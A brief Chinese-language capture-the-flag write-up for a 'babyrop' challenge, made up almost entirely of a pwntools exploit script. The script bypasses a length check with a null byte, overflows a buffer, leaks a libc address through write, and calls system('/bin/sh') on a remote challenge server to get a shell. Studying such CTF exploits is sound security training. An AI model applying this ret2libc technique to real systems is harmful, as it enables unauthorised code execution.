这道题我没时间去仔细的想
emem最后说是00截断长度判断的函数然后正常泄露libc基址getshell
先上exp晚上说说我调试的过程
#coding:utf-8
from pwn import *
context.binary = './babyrop'
io = remote('47.112.137.238',13337)
# io = process('./babyrop')
elf = ELF("./babyrop")
libc = ELF('./libc-2.23.so')
# libc = ELF("/lib/i386-linux-gnu/libc.so.6")
io.send("\x00" * 0x1 + "\xff" * (0x20 - 0x1))
sleep(0.2)
payload = 'a' * 235 + flat(elf.plt['write'],0x8048825,0x1,elf.got['write'],0x4)
io.sendline(payload)
base = u32(io.recvuntil("\xf7")[-4:]) - libc.symbols['write']
success(hex(base))
system = base + libc.symbols['system']
success(hex(system))
binsh = base + libc.search("/bin/sh").next()
#gdb.attach(io,'b *0x8048824')
io.send("\x00" * 0x1 + "\xff" * (0x20 - 0x1))
sleep(0.2)
payload = 'a' * 235 + flat(system,0xdeadbeef,binsh)
io.sendline(payload)
#
io.interactive()
pwn好难